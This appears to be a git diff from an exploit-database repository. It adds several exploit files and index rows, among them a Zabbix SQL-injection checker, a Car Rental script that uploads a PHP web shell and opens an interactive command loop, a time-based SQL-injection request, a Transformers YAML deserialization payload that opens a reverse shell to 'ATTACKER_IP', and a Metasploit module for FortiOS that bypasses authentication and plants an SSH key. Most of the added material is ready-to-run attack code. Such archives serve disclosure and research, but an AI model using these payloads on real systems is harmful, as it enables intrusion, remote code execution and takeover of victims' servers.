|
||||
import argparse
|
||||
|
||||
HEADERS = {"Content-Type": "application/json"}
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="CHECK for CVE-2024-42327")
|
||||
parser.add_argument("-t", "--target", required=True, help="API URL")
|
||||
parser.add_argument("-u", "--username", required=True, help="Username")
|
||||
parser.add_argument("-p", "--password", required=True, help="Password")
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
url = f"{args.target.rstrip('/')}/api_jsonrpc.php"
|
||||
|
||||
# Login to get the token
|
||||
login_data = {
|
||||
"jsonrpc": "2.0",
|
||||
"method": "user.login",
|
||||
"params": {"username": args.username, "password": args.password},
|
||||
"id": 1,
|
||||
"auth": None
|
||||
}
|
||||
|
||||
try:
|
||||
login_response = requests.post(url, json=login_data, headers=HEADERS)
|
||||
login_response.raise_for_status()
|
||||
auth_token = login_response.json().get("result")
|
||||
|
||||
# Simple SQLi test
|
||||
data = {
|
||||
"jsonrpc": "2.0",
|
||||
"method": "user.get",
|
||||
"params": {
|
||||
"selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
|
||||
"userids": ["1", "2"]
|
||||
},
|
||||
"id": 1,
|
||||
"auth": auth_token
|
||||
}
|
||||
|
||||
test_response = requests.post(url, json=data, headers=HEADERS)
|
||||
test_response.raise_for_status()
|
||||
|
||||
if "error" in test_response.text:
|
||||
print("[-] NOT VULNERABLE.")
|
||||
else:
|
||||
print("[!] VULNERABLE.")
|
||||
|
||||
except requests.RequestException as e:
|
||||
print(f"[!] Request error: {e}")
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
45
exploits/php/webapps/52235.txt
Normal file
45
exploits/php/webapps/52235.txt
Normal file
|
@ -0,0 +1,45 @@
|
|||
# Exploit Title: phpMyFAQ v3.2.10 - Unintended File Download Triggered by Embedded Frames
|
||||
# Date: 13 Dec 2024
|
||||
# Exploit Author: George Chen
|
||||
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ/
|
||||
# Software Link: https://github.com/thorsten/phpMyFAQ/
|
||||
# Version: v3.2.10
|
||||
# Tested on: Mac, Win
|
||||
# CVE : CVE-2024–55889
|
||||
|
||||
|
||||
*Summary*
|
||||
A vulnerability exists in the FAQ Record component of
|
||||
https://github.com/thorsten/phpMyFAQ v3.2.10 where a privileged attacker
|
||||
can trigger a file download on a victim’s machine upon page visit by
|
||||
embedding it in an <iframe> element without user interaction or explicit
|
||||
consent.
|
||||
|
||||
*Details*
|
||||
In http://localhost/admin/index.php?action=editentry&id=20&lang=en, where a
|
||||
FAQ record is either created or edited, an attacker can insert an iframe,
|
||||
as “source code”, pointing to a prior “malicious” attachment that the
|
||||
attacker has uploaded via FAQ “new attachment” upload, such that any page
|
||||
visits to this FAQ will trigger an automated download (from the edit
|
||||
screen, download is automated; from the faq page view as a normal user,
|
||||
depending on the browser, a pop up confirmation may be presented before the
|
||||
actual download. Firebox browser, for instance, does not require any
|
||||
interactions).
|
||||
|
||||
[image: image.png]
|
||||
|
||||
*PoC*
|
||||
|
||||
1. create a new FAQ record and upload a “malicious” file — in my case, I
|
||||
uploaded an eicar file. Take note of the uri, ie
|
||||
“index.php?action=attachment&id=2”
|
||||
2. in the FAQ record, insert a “source code” blob using the “< >” button
|
||||
3. insert in the following snippet and save FAQ record:
|
||||
<p><iframe src="index.php?action=attachment&id=2"></iframe></p> [image:
|
||||
image.png]
|
||||
4. Once the edit page reloads, the malicious code will be downloaded
|
||||
onto the local machine without user interaction:[image: image.png]
|
||||
|
||||
Advisory:
|
||||
https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-m3r7-8gw7-qwvc
|
||||
Disclosure: https://geochen.medium.com/cve-2024-55889-03572ae6c35c
|
91
exploits/php/webapps/52243.py
Executable file
91
exploits/php/webapps/52243.py
Executable file
|
@ -0,0 +1,91 @@
|
|||
# Exploit Title: Car Rental Project 1.0 - Remote Code Execution
|
||||
# Date: 1/3/2020
|
||||
# Exploit Author: FULLSHADE, SC
|
||||
# Vendor Homepage: https://phpgurukul.com/
|
||||
# Software Link: https://phpgurukul.com/car-rental-project-php-mysql-free-download/
|
||||
# Version: 1.0
|
||||
# Tested on: Windows
|
||||
# CVE : CVE-2020-5509
|
||||
# ==================================================
|
||||
# Information & description
|
||||
# ==================================================
|
||||
# Car Rental Project v.1.0 is vulnerable to arbitrary file upload since an admin can change the image of a product and the file change PHP code doesn't validate or care what type of file is submitted, which leads to an attack having the ability to upload malicious files. This Python POC will execute arbitrary commands on the remote server.
|
||||
# ==================================================
|
||||
# Manual POC
|
||||
# ==================================================
|
||||
# Manual POC method
|
||||
# - Visit carrental > admin login > changeimage1.php
|
||||
# - Upload a php rce vulnerable payload
|
||||
# - Visit /carrentalproject/carrental/admin/img/vehicleimages/.php to visit your file
|
||||
# - Execute commands on the server
|
||||
# ==================================================
|
||||
# POC automation script
|
||||
# ==================================================
|
||||
|
||||
import sys
|
||||
import requests
|
||||
|
||||
print("""
|
||||
+-------------------------------------------------------------+
|
||||
Car Rental Project v1.0 - Remote Code Execution
|
||||
FULLSHADE, FullPwn Operations
|
||||
+-------------------------------------------------------------+
|
||||
""")
|
||||
|
||||
def login():
|
||||
sessionObj = requests.session()
|
||||
RHOSTS = sys.argv[1]
|
||||
bigstring = "\n+-------------------------------------------------------------+\n"
|
||||
print("+-------------------------------------------------------------+")
|
||||
print("[+] Victim host: {}".format(RHOSTs))
|
||||
POST_AUTH_LOGIN = "http://" + RHOSTS + "/carrentalproject/carrental/admin/index.php"
|
||||
SHELL_UPLOAD_URL = "http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"
|
||||
|
||||
# login / authentication
|
||||
payload = {"username": "admin", "password": "Test@12345", "login": ""}
|
||||
login = sessionObj.post(POST_AUTH_LOGIN, data=payload)
|
||||
|
||||
# get response
|
||||
if login.status_code == 200:
|
||||
print("[+] Login HTTP response code: 200")
|
||||
print("[+] Successfully logged in")
|
||||
else:
|
||||
print("[!] Failed to authenticate")
|
||||
sys.exit()
|
||||
|
||||
# get session token
|
||||
session_cookie_dic = sessionObj.cookies.get_dict()
|
||||
token = session_cookie_dic["PHPSESSID"]
|
||||
print("[+] Session cookie: {}".format(token))
|
||||
|
||||
# proxy for Burp testing
|
||||
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
|
||||
|
||||
# data for uploading the backdoor request
|
||||
backdoor_file = {
|
||||
"img1": (
|
||||
"1dccadfed7bcbb036c56a4afb97e906f.php",
|
||||
'<?php system($_GET["cmd"]); ?>',
|
||||
"Content-Type application/x-php",
|
||||
)
|
||||
}
|
||||
backdoor_data = {"update": ""}
|
||||
SHELL_UPLOAD_URL = "http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"
|
||||
|
||||
# actually upload the php shell
|
||||
try:
|
||||
r = sessionObj.post(url=SHELL_UPLOAD_URL, files=backdoor_file, data=backdoor_data)
|
||||
print("[+] Backdoor upload at /carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php" + bigstring)
|
||||
except:
|
||||
print("[!] Failed to upload backdoor")
|
||||
|
||||
# get command execution
|
||||
while True:
|
||||
COMMAND = str(input('\033[32m' + "Command RCE >> " + '\033[m'))
|
||||
SHELL_LOCATION = "http://" + RHOSTS + "/carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php"
|
||||
# get R,CE results
|
||||
respond = sessionObj.get(SHELL_LOCATION + "?cmd=" + COMMAND)
|
||||
print(respond.text)
|
||||
|
||||
if __name__ == "__main__":
|
||||
login()
|
15
exploits/php/webapps/52245.txt
Normal file
15
exploits/php/webapps/52245.txt
Normal file
|
@ -0,0 +1,15 @@
|
|||
# Exploit Title: KodExplorer 4.52 - Open Redirect
|
||||
# Date: 2024-11-08
|
||||
# Exploit Author: Rahad Chowdhury
|
||||
# Vendor Homepage: https://kodcloud.com/
|
||||
# Software Link: https://github.com/kalcaddle/KodExplorer/releases/tag/4.52
|
||||
# Version: 4.52
|
||||
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56
|
||||
|
||||
*Steps to Reproduce:*
|
||||
|
||||
1. At first visit this url http://target.com/index.php?user/login&link=.
|
||||
2. Then use any malicious url in link parameter.
|
||||
3. your link will be look like:
|
||||
http://target.com/index.php?user/login&link=https://{site}.com
|
||||
4. login your account and you will redirect to malicious url.
|
52
exploits/php/webapps/52247.txt
Normal file
52
exploits/php/webapps/52247.txt
Normal file
|
@ -0,0 +1,52 @@
|
|||
# Exploit Title: Smart Manager 8.27.0 - Post-Authenticated SQL Injection
|
||||
# Date: 2024-01-18
|
||||
# Exploit Author: Ivan Spiridonov - xbz0n
|
||||
# Vendor Homepage: https://www.storeapps.org/
|
||||
# Software Link: https://www.storeapps.org/product/smart-manager/
|
||||
# Version: 8.27.0
|
||||
# Tested on: Ubuntu 22.04
|
||||
# CVE: CVE-2024-0566
|
||||
|
||||
## SQL Injection
|
||||
|
||||
The plugin does not properly sanitize and escape a parameter before using it in an SQL statement, leading to an SQL injection exploitable by high-privilege users such as admin.
|
||||
|
||||
## Affected Components
|
||||
|
||||
- **Plugin:** Smart Manager
|
||||
- **Version:** 8.27.0
|
||||
- **Affected Parameters:** 'sort_params%5BsortOrder%5D', 'sort_params%5Bcolumn%5D'
|
||||
- **Affected Endpoint:** /wp-admin/admin-ajax.php
|
||||
|
||||
## Description
|
||||
|
||||
The vulnerability is located within the admin AJAX endpoint in the sorting parameters 'sort_params%5BsortOrder%5D' and 'sort_params%5Bcolumn%5D'. By manipulating these parameters, authenticated attackers can inject SQL commands, leading to a time-based SQL Injection vulnerability.
|
||||
|
||||
## Proof of Concept
|
||||
|
||||
### Manual Exploitation
|
||||
|
||||
```http
|
||||
POST /wp-admin/admin-ajax.php?action=sm_beta_include_file HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
|
||||
Accept: text/plain, */*; q=0.01
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Referer: http://localhost/wp-admin/admin.php?page=smart-manager
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 1117
|
||||
Origin: http://localhost
|
||||
Connection: close
|
||||
Cookie: Sec-Fetch-Dest: empty
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Site: same-origin
|
||||
cmd=get_data_model&active_module=product&security=37e8d818b7&is_public=1&sm_page=1&sm_limit=50&SM_IS_WOO30=true&sort_params%5Bcolumn%5D=postmeta%2Fmeta_key%3D_tax_status%2Fmeta_value%3D_tax_status&sort_params%5BsortOrder%5D=asc%2c(select*from(select(sleep(20)))a)&table_model%5Bposts%5D%5Bpkey%5D=ID&table_model%5Bposts%5D%5Bjoin_on%5D=&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D%5B%5D=product&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D%5B%5D=product_variation&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_status%5D=any&table_model%5Bpostmeta%5D%5Bpkey%5D=post_id&table_model%5Bpostmeta%5D%5Bjoin_on%5D=postmeta.post_ID+%3D+posts.ID&table_model%5Bterm_relationships%5D%5Bpkey%5D=object_id&table_model%5Bterm_relationships%5D%5Bjoin_on%5D=term_relationships.object_id+%3D+posts.ID&table_model%5Bterm_taxonomy%5D%5Bpkey%5D=term_taxonomy_id&table_model%5Bterm_taxonomy%5D%5Bjoin_on%5D=term_taxonomy.term_taxonomy_id+%3D+term_relationships.term_taxonomy_id&table_model%5Bterms%5D%5Bpkey%5D=term_id&table_model%5Bterms%5D%5Bjoin_on%5D=terms.term_id+%3D+term_taxonomy.term_id&search_text=&advanced_search_query=%5B%5D&is_view=0&isTasks=0&is_taxonomy=0
|
||||
```
|
||||
|
||||
If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.
|
||||
|
||||
## Recommendations
|
||||
|
||||
Users of Smart Manager v8.27.0 are strongly advised to restrict access to the affected endpoint and update the plugin to the latest version.
|
31
exploits/python/remote/52227.txt
Normal file
31
exploits/python/remote/52227.txt
Normal file
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title: Hugging Face Transformers MobileViTV2 RCE
|
||||
# Date: 29-11-2024
|
||||
# Exploit Author: The Kernel Panic
|
||||
# Vendor Homepage: https://huggingface.co/
|
||||
# Software Link: https://github.com/huggingface/transformers/releases
|
||||
# Version: 4.41.1
|
||||
# Tested on: Linux, Windows, Mac
|
||||
# CVE : CVE-2024-11392
|
||||
|
||||
|
||||
# Code flow from input to the vulnerable condition:
|
||||
# 1. The user downloads a third-party ml-cvnet model alongside its configuration file.
|
||||
# 2. The user runs the convert_mlcvnets_to_pytorch.py script and passes the configuration file to it.
|
||||
# 3. The convert_mlcvnets_to_pytorch.py script de-serializes the configuration file and executes the malicious code.
|
||||
|
||||
|
||||
# POC
|
||||
|
||||
# Create a malicious yaml configuration file called "transformers_exploit.yaml" like shown below.
|
||||
# Note: Remember to change the 'ATTACKER_IP' and 'ATTACKER_PORT'.
|
||||
|
||||
!!python/object/new:type
|
||||
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
|
||||
listitems: "__import__('socket').socket(socket.AF_INET, socket.SOCK_STREAM).connect(('ATTACKER_IP', ATTACKER_PORT));import os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',ATTACKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')"
|
||||
|
||||
|
||||
# Run the convert_mlcvnets_to_pytorch.py script and pass the transformers_exploit.yaml file to --orig_config_path
|
||||
|
||||
> python convert_mlcvnets_to_pytorch.py --orig_checkpoint_path dummy_checkpoint.pt --or
|
||||
|
||||
# Note: The dummy_checkpoint.pt can be left as an empty file, dummy_output as an empty directory , and "task" as any of the options metioned in the script.
|
16
exploits/windows/remote/52237.txt
Normal file
16
exploits/windows/remote/52237.txt
Normal file
|
@ -0,0 +1,16 @@
|
|||
# Exploit Title: WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page
|
||||
# Date: 25-01-2024
|
||||
# Exploit Author: Rasime Ekici
|
||||
# Vendor Homepage: www.softwareag.com
|
||||
# Version: 10.15.0000-0092
|
||||
# Tested on: 10.15.0000-0092
|
||||
# CVE : 2024-23733
|
||||
|
||||
Description:
|
||||
|
||||
The /WmAdmin/,/invoke/vm.server/login login page in the Integration Server in Software AG webMethods 10.15.0 before Core Fix7 allows remote attackers to reach the administration panel,discovering server hostname and version information by sending arbitary username and blank password to the /WmAdmin/#/login/ uri
|
||||
|
||||
Interpret the http traffic and send a dummy username with blank password on login screen and drop the request to "/admin/navigation/license" to not logged out.Thus you may able to see:
|
||||
-real hostname of the installed server
|
||||
-version info
|
||||
-administrative api endpoints
|
279
exploits/windows/remote/52239.py
Executable file
279
exploits/windows/remote/52239.py
Executable file
|
@ -0,0 +1,279 @@
|
|||
# Exploit Title: Fortinet FortiOS, FortiProxy, and FortiSwitchManager 7.2.0 - Authentication bypass
|
||||
# Date: 2022-10-10
|
||||
# Exploit Author: Zach Hanley, SC
|
||||
# Vendor Homepage: https://www.fortinet.com
|
||||
# Version: 7.0.0
|
||||
# Tested on: Linux
|
||||
# CVE : CVE-2022-40684
|
||||
|
||||
|
||||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::SSH
|
||||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
|
||||
attr_accessor :ssh_socket
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.',
|
||||
'Description' => %q{
|
||||
This module exploits an authentication bypass vulnerability
|
||||
in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API
|
||||
to gain access to a chosen account. And then add a SSH key to the
|
||||
authorized_keys file of the chosen account, allowing
|
||||
to login to the system with the chosen account.
|
||||
|
||||
Successful exploitation results in remote code execution.
|
||||
},
|
||||
'Author' => [
|
||||
'Heyder Andrade <@HeyderAndrade>', # Metasploit module
|
||||
'Zach Hanley <@hacks_zach>', # PoC
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2022-40684'],
|
||||
['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'],
|
||||
['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'],
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DisclosureDate' => '2022-10-10', # Vendor advisory
|
||||
'Platform' => ['unix', 'linux'],
|
||||
'Arch' => [ARCH_CMD],
|
||||
'Privileged' => true,
|
||||
'Targets' => [
|
||||
[
|
||||
'FortiOS',
|
||||
{
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'generic/ssh/interact'
|
||||
},
|
||||
'Payload' => {
|
||||
'Compat' => {
|
||||
'PayloadType' => 'ssh_interact'
|
||||
}
|
||||
}
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => {
|
||||
'RPORT' => 443,
|
||||
'SSL' => true
|
||||
},
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SAFE],
|
||||
'Reliability' => [REPEATABLE_SESSION],
|
||||
'SideEffects' => [
|
||||
IOC_IN_LOGS,
|
||||
ARTIFACTS_ON_DISK # SSH key is added to authorized_keys file
|
||||
]
|
||||
}
|
||||
)
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']),
|
||||
OptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]),
|
||||
OptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]),
|
||||
OptString.new('KEY_PASS', [false, 'SSH private key password', nil]),
|
||||
OptString.new('SSH_RPORT', [true, 'SSH port to connect to', 22]),
|
||||
OptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
|
||||
def username
|
||||
if datastore['USERNAME']
|
||||
@username ||= datastore['USERNAME']
|
||||
else
|
||||
@username ||= detect_username
|
||||
end
|
||||
end
|
||||
|
||||
def ssh_rport
|
||||
datastore['SSH_RPORT']
|
||||
end
|
||||
|
||||
def current_keys
|
||||
@current_keys ||= read_keys
|
||||
end
|
||||
|
||||
def ssh_keygen
|
||||
# ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8`
|
||||
if datastore['PRIVATE_KEY']
|
||||
@ssh_keygen ||= Net::SSH::KeyFactory.load_data_private_key(
|
||||
File.read(datastore['PRIVATE_KEY']),
|
||||
datastore['KEY_PASS'],
|
||||
datastore['PRIVATE_KEY']
|
||||
)
|
||||
else
|
||||
@ssh_keygen ||= OpenSSL::PKey::EC.generate('prime256v1')
|
||||
end
|
||||
end
|
||||
|
||||
def ssh_private_key
|
||||
ssh_keygen.to_pem
|
||||
end
|
||||
|
||||
def ssh_pubkey
|
||||
Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)
|
||||
end
|
||||
|
||||
def authorized_keys
|
||||
pubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)
|
||||
"#{ssh_keygen.ssh_type} #{pubkey} #{username}@localhost"
|
||||
end
|
||||
|
||||
def fortinet_request(params = {})
|
||||
send_request_cgi(
|
||||
{
|
||||
'ctype' => 'application/json',
|
||||
'agent' => 'Report Runner',
|
||||
'headers' => {
|
||||
'Forwarded' => "for=\"[127.0.0.1]:#{rand(1024..65535)}\";by=\"[127.0.0.1]:#{rand(1024..65535)}\""
|
||||
}
|
||||
}.merge(params)
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
vprint_status("Checking #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||
# a normal request to the API should return a 401
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),
|
||||
'ctype' => 'application/json'
|
||||
})
|
||||
|
||||
return CheckCode::Unknown('Target did not respond to check.') unless res
|
||||
return CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401
|
||||
|
||||
# Trying to bypasss the authentication and get the sshkey from the current targeted user it should return a 200 if vulnerable
|
||||
res = fortinet_request({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, '/system/status')
|
||||
})
|
||||
|
||||
return CheckCode::Safe unless res&.code == 200
|
||||
|
||||
version = res.get_json_document['version']
|
||||
|
||||
print_good("Target is running the version #{version}, which is vulnerable.")
|
||||
|
||||
Socket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']) { |sock| return CheckCode::Safe('However SSH is not open, so adding a ssh key wouldn\t give you access to the host.') unless sock }
|
||||
|
||||
CheckCode::Vulnerable('And SSH is running which makes it exploitable.')
|
||||
end
|
||||
|
||||
def cleanup
|
||||
return unless ssh_socket
|
||||
|
||||
# it assumes our key is the last one and set it to a random text. The API didn't respond to DELETE method
|
||||
data = {
|
||||
"ssh-public-key#{current_keys.empty? ? '1' : current_keys.size}" => '""'
|
||||
}
|
||||
|
||||
fortinet_request({
|
||||
'method' => 'PUT',
|
||||
'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
|
||||
'data' => data.to_json
|
||||
})
|
||||
end
|
||||
|
||||
def detect_username
|
||||
vprint_status('User auto-detection...')
|
||||
res = fortinet_request(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, '/system/admin')
|
||||
)
|
||||
users = res.get_json_document['results'].collect { |e| e['name'] if (e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0') }.compact
|
||||
# we prefer to use admin, but if it doesn't exist we chose a random one.
|
||||
if datastore['PREFER_ADMIN']
|
||||
vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.")
|
||||
users.include?('admin') ? 'admin' : users.sample
|
||||
else
|
||||
vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random that is not the admin.")
|
||||
(users - ['admin']).sample
|
||||
end
|
||||
end
|
||||
|
||||
def add_ssh_key
|
||||
if current_keys.include?(authorized_keys)
|
||||
# then we'll remove that on cleanup
|
||||
print_good('Your key is already in the authorized_keys file')
|
||||
return
|
||||
end
|
||||
vprint_status('Adding SSH key to authorized_keys file')
|
||||
# Adding the SSH key as the last entry in the authorized_keys file
|
||||
keystoadd = current_keys.first(2) + [authorized_keys]
|
||||
data = keystoadd.map.with_index { |key, idx| ["ssh-public-key#{idx + 1}", "\"#{key}\""] }.to_h
|
||||
|
||||
res = fortinet_request({
|
||||
'method' => 'PUT',
|
||||
'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
|
||||
'data' => data.to_json
|
||||
})
|
||||
fail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500
|
||||
body = res.get_json_document
|
||||
fail_with(Failure::UnexpectedReply, 'Unexpected reponse from the server after adding the key.') unless body.key?('cli_error') && body['cli_error'] =~ /SSH key is good/
|
||||
end
|
||||
|
||||
def read_keys
|
||||
vprint_status('Reading SSH key from authorized_keys file')
|
||||
res = fortinet_request({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, '/system/admin/', username)
|
||||
})
|
||||
fail_with(Failure::UnexpectedReply, 'Failed read current SSH keys') unless res&.code == 200
|
||||
result = res.get_json_document['results'].first
|
||||
['ssh-public-key1', 'ssh-public-key2', 'ssh-public-key3'].map do |key|
|
||||
result[key].gsub('"', '') unless result[key].empty?
|
||||
end.compact
|
||||
end
|
||||
|
||||
def do_login(ssh_options)
|
||||
# ensure we don't have a stale socket hanging around
|
||||
ssh_options[:proxy].proxies = nil if ssh_options[:proxy]
|
||||
begin
|
||||
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
|
||||
self.ssh_socket = Net::SSH.start(rhost, username, ssh_options)
|
||||
end
|
||||
rescue Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, 'Disconnected during negotiation')
|
||||
rescue Net::SSH::Disconnect, ::EOFError
|
||||
fail_with(Failure::Disconnected, 'Timed out during negotiation')
|
||||
rescue Net::SSH::AuthenticationFailed
|
||||
fail_with(Failure::NoAccess, 'Failed authentication')
|
||||
rescue Net::SSH::Exception => e
|
||||
fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
|
||||
end
|
||||
|
||||
fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Executing exploit on #{datastore['RHOST']}:#{datastore['RPORT']} target user: #{username}")
|
||||
add_ssh_key
|
||||
vprint_status('Establishing SSH connection')
|
||||
ssh_options = ssh_client_defaults.merge({
|
||||
auth_methods: ['publickey'],
|
||||
key_data: [ ssh_private_key ],
|
||||
port: ssh_rport
|
||||
})
|
||||
ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']
|
||||
|
||||
do_login(ssh_options)
|
||||
|
||||
handler(ssh_socket)
|
||||
end
|
||||
end
|
|
@ -3259,6 +3259,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
36813,exploits/hardware/local/36813.txt,"ADB - Backup Archive File Overwrite Directory Traversal",2015-04-21,"Imre Rad",local,hardware,,2015-04-21,2015-04-21,0,CVE-2014-7951;OSVDB-120991,,,,,
|
||||
44983,exploits/hardware/local/44983.txt,"ADB Broadband Gateways / Routers - Local Root Jailbreak",2018-07-05,"SEC Consult",local,hardware,,2018-07-05,2018-07-05,0,CVE-2018-13108,Local,,,,
|
||||
44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware,,2018-07-05,2018-07-05,0,CVE-2018-13110,Local,,,,
|
||||
52244,exploits/hardware/local/52244.txt,"ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)",2025-04-16,ub3rsick,local,hardware,,2025-04-16,2025-04-16,0,CVE-2023-26602,,,,,
|
||||
40271,exploits/hardware/local/40271.txt,"Cisco ASA / PIX - 'EPICBANANA' Local Privilege Escalation",2016-08-19,"Shadow Brokers",local,hardware,,2016-08-19,2016-09-15,0,CVE-2016-6367,,,,,
|
||||
30237,exploits/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",local,hardware,,2013-12-12,2013-12-18,1,CVE-2013-7030;OSVDB-100916,,,,,
|
||||
34954,exploits/hardware/local/34954.txt,"Cisco Unified Communications Manager 8.0 - Invalid Argument Privilege Escalation",2010-11-03,"Knud Erik Hjgaard",local,hardware,,2010-11-03,2014-10-14,1,CVE-2010-3039;OSVDB-69158,,,,,https://www.securityfocus.com/bid/44672/info
|
||||
|
@ -3279,6 +3280,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
9955,exploits/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 - Local Privilege Escalation",2009-10-20,trompele,local,hardware,,2009-10-19,,1,CVE-2009-4607;OSVDB-61789,,,,,
|
||||
41745,exploits/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",local,hardware,,2017-03-27,2017-03-27,1,CVE-2017-5227;NAS-201703-21,,,,,http://www.ush.it/team/ush/hack-qnap/qnap.txt
|
||||
32370,exploits/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Local Privilege Escalation",2014-03-19,xistence,local,hardware,,2014-03-19,2014-03-19,0,OSVDB-104664,,,,,
|
||||
52242,exploits/hardware/local/52242.txt,"Ruckus IoT Controller 1.7.1.0 - Undocumented Backdoor Account",2025-04-16,ub3rsick,local,hardware,,2025-04-16,2025-04-16,0,CVE-2021-33216,,,,,
|
||||
51832,exploits/hardware/local/51832.c,"Saflok - Key Derication Function Exploit",2024-02-28,planthopper3301,local,hardware,,2024-02-28,2024-02-28,0,,,,,,
|
||||
20999,exploits/hardware/local/20999.c,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (1)",2001-07-10,"Charles Stevenson",local,hardware,,2001-07-10,2012-09-02,1,CVE-2001-1177;OSVDB-1898,,,,,https://www.securityfocus.com/bid/3008/info
|
||||
21000,exploits/hardware/local/21000.sh,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (2)",2001-07-10,ml85p,local,hardware,,2001-07-10,2012-09-02,1,CVE-2001-1177;OSVDB-1898,,,,,https://www.securityfocus.com/bid/3008/info
|
||||
|
@ -3546,6 +3548,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
15842,exploits/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure",2010-12-29,"Craig Heffner",remote,hardware,,2010-12-29,2011-09-18,1,OSVDB-70230,,,,,
|
||||
